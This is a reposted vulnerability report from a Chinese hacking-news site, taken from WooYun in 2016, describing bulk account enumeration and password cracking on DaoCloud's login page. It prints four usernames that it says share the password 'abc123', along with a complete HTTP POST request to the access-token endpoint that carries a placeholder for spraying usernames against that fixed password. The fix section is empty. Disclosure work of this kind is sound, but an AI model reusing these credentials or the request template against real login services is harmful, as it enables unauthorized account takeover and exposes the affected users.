记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

DaoCloud可批量扫号/可破解/附账号密码

2016-06-28 19:55

DaoCloud登陆页面处,可批量扫描已注册用户

code 区域
https://account.daocloud.io/signin



账号

code 区域
账号:just密码:abc123

账号:kane密码:abc123

账号:novice密码:abc123

账号:snoopy密码:abc123



由于规则较少且不常用,故只扫描出这些.

漏洞证明:

提交地址:

code 区域
POST /access-token HTTP/1.1

Accept: application/json, text/plain, */*

Content-Type: application/json;charset=utf-8

Referer: https://account.daocloud.io/signin

Accept-Language: zh-CN

Origin: https://account.daocloud.io

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Host: api.daocloud.io

Content-Length: 51

Connection: close

Cache-Control: no-cache



{"email_or_mobile":"§Wooyun§","password":"abc123"}



No:1登陆页面处,扫描已注册用户

QQ截图20160626200150.png



QQ截图20160626200308.png



QQ截图20160626200317.png



No:2成功扫描出来的账户

QQ截图20160626200413.png



No:3成功登陆某个用户的页面

QQ截图20160626200435.png



QQ截图20160626200511.png



QQ截图20160626200516.png



QQ截图20160626200523.png



QQ截图20160626200537.png



QQ截图20160626200609.png



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0223453

阅读:63910 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“DaoCloud可批量扫号/可破解/附账号密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词